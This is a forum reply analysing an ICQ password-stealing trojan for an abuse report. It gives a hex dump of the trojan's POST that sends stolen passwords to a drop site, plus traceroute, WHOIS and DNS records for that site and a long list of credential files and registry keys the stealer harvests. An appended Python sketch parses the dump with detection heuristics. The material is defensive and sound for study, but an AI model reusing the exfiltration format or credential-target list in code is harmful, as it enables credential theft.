Re: New ICQ trojan
#13
Mad Dog, here is additional data for the abuse report.
All the passwords are sent through a socket to the address
http://www.ch-mz.ru/images/catalog/icon/fg54h.php.
Here is the exact text of the transmission via Send after all the passwords have been read.
Code:
00A40020 50 4F 53 54 20 2F 69 6D 61 67 65 73 2F 63 61 74 POST /images/cat
00A40030 61 6C 6F 67 2F 69 63 6F 6E 2F 66 67 35 34 68 2E alog/icon/fg54h.
00A40040 70 68 70 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F php HTTP/1.0..Ho
00A40050 73 74 3A 20 77 77 77 2E 63 68 2D 6D 7A 2E 72 75 st: www.ch-mz.ru
00A40060 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 ..Content-Type:
00A40070 61 70 70 6C 69 63 61 74 69 6F 6E 2F 78 2D 77 77 application/x-ww
00A40080 77 2D 66 6F 72 6D 2D 75 72 6C 65 6E 63 6F 64 65 w-form-urlencode
00A40090 64 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B d..Connection: K
00A400A0 65 65 70 2D 41 6C 69 76 65 0D 0A 50 72 61 67 6D eep-Alive..Pragm
00A400B0 61 3A 20 6E 6F 2D 63 61 63 68 65 0D 0A 55 73 65 a: no-cache..Use
00A400C0 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 r-Agent: Mozilla
00A400D0 2F 34 2E 30 20 28 63 6F 6D 70 61 74 69 62 6C 65 /4.0 (compatible
00A400E0 3B 20 4D 53 49 45 20 36 2E 30 3B 20 57 69 6E 64 ; MSIE 6.0; Wind
00A400F0 6F 77 73 20 4E 54 20 35 2E 31 3B 20 53 56 31 3B ows NT 5.1; SV1;
00A40100 20 49 6E 66 6F 50 61 74 68 2E 32 3B 20 2E 4E 45 InfoPath.2; .NE
00A40110 54 20 43 4C 52 20 32 2E 30 2E 35 30 37 32 37 3B T CLR 2.0.50727;
00A40120 20 49 6E 66 6F 50 61 74 68 2E 31 29 0D 0A 43 6F InfoPath.1)..Co
00A40130 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 33 35 ntent-Length: 35
00A40140 35 36 0D 0A 0D 0A 61 3D 26 62 3D 67 74 26 64 3D 56....a=&b=gt&d=
00A40150 72 74 26 63 3D 00 00 00 00 00 00 00 00 00 00 00 rt&c=...........
I cut out the password data itself.
Code:
Traceroute
Tracing route to www.ch-mz.ru [87.242.98.91]...
hop rtt rtt rtt ip address fully qualified domain name
1 4 0 1 70.84.211.97 61.d3.5446.static.theplanet.com
2 0 0 0 70.87.254.5 po101.dsr02.dllstx5.theplanet.com
3 0 0 0 70.85.127.109 po52.dsr02.dllstx3.theplanet.com
4 0 0 0 70.87.253.21 et3-1.ibr03.dllstx3.theplanet.com
5 32 32 32 70.87.253.190 be.fd.5746.static.theplanet.com
6 32 51 32 206.223.115.96 equinix.ashb.retn.net
7 143 142 142 87.245.233.205 xe120-2.rt.tc1.sto.se.retn.net
8 193 167 167 90.156.216.32 max2.pvc.masterhost.ru
9 167 191 168 87.242.98.91 v1902.vps.masterhost.ru
Trace complete
I think this will be enough for them.
The site http://www.ch-mz.ru is registered with the hosting provider
www.masterhost.ru. This can be checked via
this service.
Code:
Address lookup
canonical name ch-mz.ru.
aliases www.ch-mz.ru
addresses 87.242.98.91
Domain Whois record
Queried whois.ripn.net with "ch-mz.ru"...
% By submitting a query to RIPN's Whois Service
% you agree to abide by the following terms of use:
% http://www.ripn.net/about/servpol.html#3.2 (in Russian)
% http://www.ripn.net/about/en/servpol.html#3.2 (in English).
SITE OWNER
domain: CH-MZ.RU
type: CORPORATE
nserver: ns1.budagovsky.ru.
nserver: ns2.budagovsky.ru.
state: REGISTERED, DELEGATED
person: Private Person
phone: +7 9021 762483
e-mail: [email protected]
registrar: REGTIME-REG-RIPN
created: 2007.12.19
paid-till: 2009.12.19
source: TC-RIPN
Last updated on 2009.09.25 00:02:05 MSK/MSD
Network Whois record
Queried whois.ripe.net with "-B 87.242.98.91"...
% Information related to '87.242.98.0 - 87.242.99.255'
inetnum: 87.242.98.0 - 87.242.99.255
netname: MASTERHOST-VPS-2
descr: MasterHost VPS services
country: RU
admin-c: MHST-RIPE
tech-c: MHST-RIPE
status: ASSIGNED PA
notify: [email protected]
mnt-by: MASTERHOST-MNT
changed: [email protected] 20060502
source: RIPE
role: MASTERHOST NOC
address: .masterhost
address: Lyalin lane 3, bld 3
address: 105062 Moscow
address: Russia
phone: +7 495 7729720
fax-no: +7 495 7729723
e-mail: [email protected]
remarks: ----------------------------------------------------------
remarks: MASTERHOST is available 24 x 7
remarks: ----------------------------------------------------------
remarks: Points of contact for MASTERHOST Network Operations
remarks: ----------------------------------------------------------
remarks: Routing and peering issues: [email protected]
remarks: SPAM and Network security issues: [email protected]
remarks: Mail and News issues: [email protected]
remarks: Customer support: [email protected]
remarks: General information: [email protected]
remarks: ----------------------------------------------------------
admin-c: AAS-RIPE
tech-c: AAS-RIPE
tech-c: UNK-RIPE
nic-hdl: MHST-RIPE
notify: [email protected]
abuse-mailbox: [email protected]
mnt-by: MASTERHOST-MNT
changed: [email protected] 20050714
changed: [email protected] 20050802
changed: [email protected] 20070410
source: RIPE
% Information related to '87.242.64.0/18AS25532'
route: 87.242.64.0/18
descr: .masterhost
origin: AS25532
notify: [email protected]
mnt-by: MASTERHOST-MNT
changed: [email protected] 20050729
source: RIPE
DNS records
name class type data time to live
www.ch-mz.ru IN CNAME ch-mz.ru 86127s (23:55:27)
ch-mz.ru IN MX preference: 10
exchange: mail.ch-mz.ru
86400s (1.00:00:00)
ch-mz.ru IN SOA server: ns2.budagovsky.ru
email: ars.budagovsky.ru
serial: 0
refresh: 10800
retry: 3600
expire: 604800
minimum ttl: 10800
86400s (1.00:00:00)
ch-mz.ru IN NS ns2.budagovsky.ru 86400s (1.00:00:00)
ch-mz.ru IN NS ns1.budagovsky.ru 86400s (1.00:00:00)
ch-mz.ru IN A 87.242.98.91 86400s (1.00:00:00)
91.98.242.87.in-addr.arpa IN PTR v1902.vps.masterhost.ru 628s (00:10:28)
The first time I did not look carefully enough at what exactly is stolen from the system. Here is
an approximate list.
Files:
Code:
C:\WINDOWS\WCX_FTP.INI
C:\Documents and Settings\Пользователь\Application Data\OPERA\OPERA\PROFILE\WAND.DAT
C:\Documents and Settings\Пользователь\Application Data\OPERA\OPERA\MAIL\ACCOUNTS.INI
C:\Documents and Settings\Пользователь\Application Data\THUNDERBIRD\PROFILES.INI
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\2.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\3.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\5.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\6.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\7.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP\8.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\2.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\3.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\5.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\6.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\7.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP Pro\8.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\2.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\3.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\5.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\6.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\7.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 7 Professional\8.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\2.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\3.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\5.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\6.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\7.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\GlobalSCAPE\CuteFTP 8 Professional\8.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\2.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\3.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\5.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\6.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\7.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\8.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\2.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\3.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\5.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\6.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\7.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\8.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\2.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\3.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\5.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\6.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\7.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 7 Professional\8.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\2.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\3.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\5.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\6.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\7.0\sm.dat
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP 8 Professional\8.0\sm.dat
C:\Documents and Settings\Пользователь\Application Data\.gaim\accounts.xml
C:\Documents and Settings\Пользователь\Application Data\FileZilla\sitemanager.xml
C:\WINDOWS\VD3User.dat
C:\WINDOWS\Vd3main.dat
C:\Program Files\FTP Commander\Ftplist.txt
C:\Program Files\FTP Commander Pro\Ftplist.txt
C:\Program Files\FTP Commander Deluxe\Ftplist.txt
C:\Program Files\Total Commander\Profiles\Prof\ftp.ini
C:\WINDOWS\edialer.ini
C:\Program Files\Trillian\User Settings\*.*
Registry keys:
Code:
SOFTWARE\RIT\The Bat!
SOFTWARE\Mirabilis\ICQ\DefaultPrefs
SOFTWARE\Mirabilis\ICQ\NewOwners
Software\Ghisler\Windows Commander
Software\Ghisler\Total Commander
Software\RimArts\B2\Settings
Software\Microsoft\Internet Account Manager\Accounts
SOFTWARE\Far\Plugins\FTP\Hosts
Software\Mail.Ru\Agent\mra_logins
Software\CoffeeCup Software\Internet\Profiles
Good luck everyone.

Take care of your data.
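Added example, not code from the post: it rebuilds the quoted hex dump into the raw HTTP request, parses the request line, headers and form fields, and runs a few defender-side heuristics over the result. The host and path values come from the dump above; the size and field-count thresholds in exfil_indicators are assumptions chosen for illustration.

```python
from urllib.parse import parse_qsl
# Hex dump quoted in the post; the trailing NULs are where the password data was cut out.
HEXDUMP = """\
00A40020 50 4F 53 54 20 2F 69 6D 61 67 65 73 2F 63 61 74 POST /images/cat
00A40030 61 6C 6F 67 2F 69 63 6F 6E 2F 66 67 35 34 68 2E alog/icon/fg54h.
00A40040 70 68 70 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F php HTTP/1.0..Ho
00A40050 73 74 3A 20 77 77 77 2E 63 68 2D 6D 7A 2E 72 75 st: www.ch-mz.ru
00A40060 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 ..Content-Type:
00A40070 61 70 70 6C 69 63 61 74 69 6F 6E 2F 78 2D 77 77 application/x-ww
00A40080 77 2D 66 6F 72 6D 2D 75 72 6C 65 6E 63 6F 64 65 w-form-urlencode
00A40090 64 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B d..Connection: K
00A400A0 65 65 70 2D 41 6C 69 76 65 0D 0A 50 72 61 67 6D eep-Alive..Pragm
00A400B0 61 3A 20 6E 6F 2D 63 61 63 68 65 0D 0A 55 73 65 a: no-cache..Use
00A400C0 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 r-Agent: Mozilla
00A400D0 2F 34 2E 30 20 28 63 6F 6D 70 61 74 69 62 6C 65 /4.0 (compatible
00A400E0 3B 20 4D 53 49 45 20 36 2E 30 3B 20 57 69 6E 64 ; MSIE 6.0; Wind
00A400F0 6F 77 73 20 4E 54 20 35 2E 31 3B 20 53 56 31 3B ows NT 5.1; SV1;
00A40100 20 49 6E 66 6F 50 61 74 68 2E 32 3B 20 2E 4E 45 InfoPath.2; .NE
00A40110 54 20 43 4C 52 20 32 2E 30 2E 35 30 37 32 37 3B T CLR 2.0.50727;
00A40120 20 49 6E 66 6F 50 61 74 68 2E 31 29 0D 0A 43 6F InfoPath.1)..Co
00A40130 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 33 35 ntent-Length: 35
00A40140 35 36 0D 0A 0D 0A 61 3D 26 62 3D 67 74 26 64 3D 56....a=&b=gt&d=
00A40150 72 74 26 63 3D 00 00 00 00 00 00 00 00 00 00 00 rt&c=...........
"""

def hexdump_to_bytes(dump):
    """Rebuild raw bytes: drop the address column, take the 16 hex tokens, ignore the ASCII column."""
    return bytes(int(tok, 16) for line in dump.splitlines() if line.strip()
                 for tok in line.split()[1:17])

def parse_request(raw):
    """Split a captured HTTP request into method, path, headers and form fields."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {k.strip().lower(): v.strip() for k, _, v in (h.partition(":") for h in lines[1:])}
    fields = parse_qsl(body.rstrip(b"\x00").decode("latin-1"), keep_blank_values=True)
    return {"method": method, "path": path, "headers": headers,
            "content_length": int(headers.get("content-length", 0)), "fields": fields}

def exfil_indicators(req):
    """Heuristics a defender can run over reconstructed requests to spot stealer uploads (thresholds assumed)."""
    reasons = []
    if req["method"] == "POST" and req["path"].endswith(".php") and "/images/" in req["path"]:
        reasons.append("POST to a PHP script hidden under an images directory")
    if req["content_length"] > 1024 and len(req["fields"]) <= 4:
        reasons.append("kilobytes of form body in only a handful of fields")
    if req["headers"].get("host") == "www.ch-mz.ru":
        reasons.append("Host matches the drop site named in the post")
    return reasons
```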